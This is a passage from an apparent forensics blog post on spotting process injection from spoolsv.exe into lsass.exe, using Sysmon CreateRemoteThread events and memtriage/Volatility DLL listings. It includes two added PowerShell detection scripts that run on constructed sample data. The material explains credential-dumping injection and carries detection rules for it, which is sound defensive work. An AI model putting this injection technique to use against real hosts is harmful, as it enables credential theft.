style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CreateRemoteThread detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:05:04.992</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><font color="#04ff00">SourceProcessId: 1120</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceImage: C:\Windows\System32\spoolsv.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessGuid: {fc3f293c-bb4e-5f13-015e-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessId: 476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetImage: C:\Windows\System32\lsass.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">NewThreadId: 1864</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 
10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">StartAddress: 0x000000A0FF660000</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartModule: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartFunction: -</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And above we see that </font><font face="courier">spoolsv.exe</font><font face="inherit"> calls </font><font 
face="courier">CreateRemoteThread()</font><font face="inherit"> against </font><font face="courier">lsass.exe</font><font face="inherit">, which is the Local Security Authority Subsystem Service and handles security policy enforcement, password changes, authentication, and the like. When attackers want to dump credentials on Windows, they often do so by attacking </font><font face="courier">lsass</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">There is other data that Sysmon could give us. If we were running it with Image Loads configured, which creates a ton of noise, it would show us what dlls are loaded into processes and when. 
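</font></span></div>
<p>The two Sysmon records discussed here, a CreateRemoteThread event (Event ID 8) and the Image Load events (Event ID 7) that would follow it, can be correlated mechanically. The script below is an added example and is not code from this post or from Sysmon. It uses Sysmon's own EventData field names, but the events themselves are constructed sample data (the lsass.exe event is the one shown above; the PowerShell-to-spooler event, its PID 5204, its start address and all the Event ID 7 timestamps are made up), and the empty allow list is a placeholder to be filled from a baseline of the environment.</p>

```powershell
# Added example (not code from the original post or from Sysmon): correlate Sysmon
# CreateRemoteThread events (Event ID 8) with ImageLoad events (Event ID 7) into
# the same target process shortly afterwards. The events below are constructed
# sample data using Sysmon's own field names; on a live host they would come from
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7, 8 }
# with the EventData fields read out of each event's XML.

# Constructed sample events: the spoolsv.exe -> lsass.exe event from the post, a
# remote thread from a PowerShell process into the spooler (PID 5204, its start
# address and every timestamp except the lsass event are made up), and the DLL
# loads into the spooler that followed it.
$SampleEvents = @(
    [pscustomobject]@{ Id = 8; UtcTime = '2020-07-19 20:03:58.410'
        SourceImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; SourceProcessId = 5204
        TargetImage = 'C:\Windows\System32\spoolsv.exe'; TargetProcessId = 1120
        StartAddress = '0x000001C4AB1F0000'; StartModule = '-'; StartFunction = '-' }
    [pscustomobject]@{ Id = 7; UtcTime = '2020-07-19 20:04:12.003'; ProcessId = 1120
        Image = 'C:\Windows\System32\spoolsv.exe'; ImageLoaded = 'C:\Windows\System32\clusapi.dll' }
    [pscustomobject]@{ Id = 7; UtcTime = '2020-07-19 20:04:12.010'; ProcessId = 1120
        Image = 'C:\Windows\System32\spoolsv.exe'; ImageLoaded = 'C:\Windows\System32\cryptdll.dll' }
    [pscustomobject]@{ Id = 8; UtcTime = '2020-07-19 20:05:04.992'
        SourceImage = 'C:\Windows\System32\spoolsv.exe'; SourceProcessId = 1120
        TargetImage = 'C:\Windows\System32\lsass.exe'; TargetProcessId = 476
        StartAddress = '0x000000A0FF660000'; StartModule = '-'; StartFunction = '-' }
    [pscustomobject]@{ Id = 7; UtcTime = '2020-07-19 21:30:00.000'; ProcessId = 1120
        Image = 'C:\Windows\System32\spoolsv.exe'; ImageLoaded = 'C:\Windows\System32\usbmon.dll' }
)

# Processes that are expected to open threads in lsass.exe on this build.
# Placeholder (an assumption of this example): populate it from a baseline of the
# environment. Empty means every remote thread into lsass.exe is reported.
$LsassRemoteThreadAllowList = @()

function ConvertFrom-SysmonUtcTime {
    param([Parameter(Mandatory)][string]$UtcTime)
    # Sysmon writes UtcTime as 'yyyy-MM-dd HH:mm:ss.fff' in UTC.
    [datetime]::ParseExact($UtcTime, 'yyyy-MM-dd HH:mm:ss.fff', [cultureinfo]::InvariantCulture)
}

function Find-SuspiciousRemoteThread {
    # Report Event ID 8 records that target lsass.exe from a source outside the
    # allow list, or whose start address Sysmon could not map to a loaded module
    # (StartModule and StartFunction both '-', as in the event in the post).
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in ($Events | Where-Object { $_.Id -eq 8 })) {
        $reasons = @()
        if ($e.TargetImage -like '*\lsass.exe' -and $LsassRemoteThreadAllowList -notcontains $e.SourceImage) {
            $reasons += 'remote thread into lsass.exe from a source not on the allow list'
        }
        if ($e.StartModule -eq '-' -and $e.StartFunction -eq '-') {
            $reasons += 'thread start address not mapped to a loaded module'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                UtcTime         = $e.UtcTime
                SourceImage     = $e.SourceImage
                SourceProcessId = $e.SourceProcessId
                TargetImage     = $e.TargetImage
                TargetProcessId = $e.TargetProcessId
                Reason          = $reasons -join '; '
            }
        }
    }
}

function Find-PostInjectionImageLoad {
    # For each flagged remote thread, list the DLLs the target process loaded
    # within $WindowSeconds afterwards: the "handful of dlls loaded shortly after"
    # pattern the post describes.
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [Parameter(Mandatory)][object[]]$Threads,
        [int]$WindowSeconds = 120
    )
    $loads = @($Events | Where-Object { $_.Id -eq 7 })
    foreach ($t in $Threads) {
        $start = ConvertFrom-SysmonUtcTime $t.UtcTime
        foreach ($l in $loads) {
            if ($l.ProcessId -ne $t.TargetProcessId) { continue }
            $delta = (ConvertFrom-SysmonUtcTime $l.UtcTime) - $start
            if ($delta.TotalSeconds -ge 0 -and $delta.TotalSeconds -le $WindowSeconds) {
                [pscustomobject]@{
                    ThreadUtcTime = $t.UtcTime
                    SourceImage   = $t.SourceImage
                    TargetImage   = $t.TargetImage
                    SecondsAfter  = [math]::Round($delta.TotalSeconds, 3)
                    ImageLoaded   = $l.ImageLoaded
                }
            }
        }
    }
}

$suspicious = Find-SuspiciousRemoteThread -Events $SampleEvents
$suspicious | Format-Table -AutoSize
Find-PostInjectionImageLoad -Events $SampleEvents -Threads $suspicious -WindowSeconds 120 | Format-Table -AutoSize
```

<p>Run against the sample, both Event ID 8 records are reported (the spooler-to-lsass one for both reasons), and the two clusapi.dll and cryptdll.dll loads into PID 1120 about 13.6 seconds after the PowerShell thread are listed, while the usbmon.dll load an hour and a half later falls outside the window. The allow list and the window are the knobs to tune: a tight window keeps the Image Load noise manageable, and the StartModule check is a heuristic, not proof, since legitimate thread starts in unbacked memory do occur.</p>
<div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">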
If it were configured to do this on this endpoint, we would see a handful of dlls loaded into the </font><font face="courier">spoolsv.exe</font><font face="inherit"> process shortly after our third </font><font face="courier">PowerShell</font><font face="inherit"> process opened a new thread in the spooler service.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">See More: Memtriage</span></h2><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">We can see this using <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> in combination with supported <a href="https://www.volatilityfoundation.org/" target="_blank">Volatility</a> plugins. 
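</font></span></div>
<p>The dlllist CSV that this section goes on to produce (the memtriage command and its output follow below) lends itself to a quick automated first pass before reading every row. The script here is an added example, not code from this post, memtriage or Volatility. It relies only on the LoadTime and Path columns that the post's own Select-Object call shows exist; the CSV rows are a constructed sample in that shape (the last row, under C:\Users\Public, is a made-up placeholder path), and the C:\Windows system-root assumption is a parameter.</p>

```powershell
# Added example (not code from the original post, memtriage or Volatility): a
# first pass over a dlllist CSV that groups modules by LoadTime and reports the
# ones loaded well after the process itself, so the set "loaded shortly after"
# stands out without reading every row. Only the LoadTime and Path columns shown
# in the post are used; the rows below are a constructed sample in that shape
# (the real file is the one written by
#   .\memtriage.exe --pid 1120 --output csv --plugins dlllist --outfile dlllist_1120.csv).
$SampleCsv = @'
LoadTime,Path
2020-07-19 03:17:36 UTC+0000,C:\Windows\System32\spoolsv.exe
2020-07-19 03:17:36 UTC+0000,C:\Windows\SYSTEM32\ntdll.dll
2020-07-19 03:17:36 UTC+0000,C:\Windows\system32\KERNEL32.DLL
2020-07-19 03:18:12 UTC+0000,C:\Windows\System32\clusapi.dll
2020-07-19 03:18:12 UTC+0000,C:\Windows\System32\localspl.dll
2020-07-19 03:18:12 UTC+0000,C:\Windows\system32\spool\PRTPROCS\x64\winprint.dll
2020-07-19 05:41:09 UTC+0000,C:\Users\Public\EXAMPLE-late-load.dll
'@

function ConvertFrom-VolatilityTime {
    param([Parameter(Mandatory)][string]$LoadTime)
    # Volatility prints 'yyyy-MM-dd HH:mm:ss UTC+0000'; keep the timestamp part.
    if ($LoadTime -notmatch '^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})') {
        throw "Unrecognised LoadTime value: $LoadTime"
    }
    [datetime]::ParseExact($Matches[1], 'yyyy-MM-dd HH:mm:ss', [cultureinfo]::InvariantCulture)
}

function Get-LateLoadedModule {
    param(
        [Parameter(Mandatory)][object[]]$DllList,  # objects from ConvertFrom-Csv
        [int]$GraceSeconds = 5,                    # loads this close to the first one count as startup
        [string]$SystemRoot = 'C:\Windows'         # assumption: adjust to the imaged host
    )
    $rows = foreach ($r in $DllList) {
        [pscustomobject]@{ LoadTime = ConvertFrom-VolatilityTime $r.LoadTime; Path = $r.Path }
    }
    # The earliest LoadTime belongs to the main module, i.e. process start.
    $processStart = ($rows | Sort-Object LoadTime | Select-Object -First 1).LoadTime
    foreach ($r in ($rows | Sort-Object LoadTime)) {
        $delta = ($r.LoadTime - $processStart).TotalSeconds
        if ($delta -le $GraceSeconds) { continue }
        [pscustomobject]@{
            LoadTime          = $r.LoadTime.ToString('yyyy-MM-dd HH:mm:ss')
            SecondsAfterStart = [int]$delta
            OutsideSystemRoot = -not ($r.Path -like "$SystemRoot\*")
            Path              = $r.Path
        }
    }
}

$dlllist = $SampleCsv | ConvertFrom-Csv
# How many modules arrived at each LoadTime: the startup cluster versus later ones.
$dlllist | Group-Object -Property LoadTime | Select-Object -Property Count, Name | Format-Table -AutoSize
Get-LateLoadedModule -DllList $dlllist -GraceSeconds 5 | Format-Table -AutoSize
```

<p>On the sample this reports the three modules loaded 36 seconds after start and the placeholder loaded hours later, with OutsideSystemRoot set only for the latter. A late LoadTime on its own is not an indicator; a service like the spooler loads print components lazily, and the page's own output shows exactly that. The path, and on the real file the signature and hash checks memtriage's other plugins can feed, are what separate a lazy load from an injected module. To use it on the real output, replace the sample with <code>$dlllist = Get-Content ./dlllist_1120.csv | ConvertFrom-Csv</code> as in the post.</p>
<div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">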
For my investigation, I downloaded </font><font face="courier">memtriage</font><font face="inherit"> to the victim system and started with this command:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">.\memtriage.exe --pid 1120 --output csv --plugins dlllist --outfile dlllist_1120.csv</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; 
font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">To quickly review the output, I used PowerShell and created a variable that assigned each CSV to an object as follows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #ecec15; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="color: #2ee721; font-variant-ligatures: no-common-ligatures;">$dlllist</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> </span><span class="s3" style="color: #828282; font-variant-ligatures: no-common-ligatures;">=</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> </span><span class="s4" style="font-variant-ligatures: 
no-common-ligatures;">Get-Content</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> ./dlllist_1120.csv | </span><span class="s4" style="font-variant-ligatures: no-common-ligatures;">ConvertFrom-Csv</span></font></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And then I selected the specific properties from those objects as follows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; 
word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #cccccc; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="color: #2ee721; font-variant-ligatures: no-common-ligatures;">$dlllist</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> | </span><span class="s3" style="color: #ecec15; font-variant-ligatures: no-common-ligatures;">Select-Object</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> </span><span class="s4" style="color: #828282; font-variant-ligatures: no-common-ligatures;">-Property</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> LoadTime</span><span class="s4" style="color: #828282; font-variant-ligatures: no-common-ligatures;">,</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;">Path</span></font></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">LoadTime <span class="Apple-converted-space"> </span>Path</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: 
no-common-ligatures;">-------- <span class="Apple-converted-space"> </span>----</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\spoolsv.exe</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\ntdll.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNEL32.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNELBASE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\USER32.dll</span></p><p class="p3" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\msvcrt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\sechost.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\RPCRT4.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\DNSAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\powrprof.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\GDI32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\WS2_32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\NSI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\combase.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\CRYPTBASE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" 
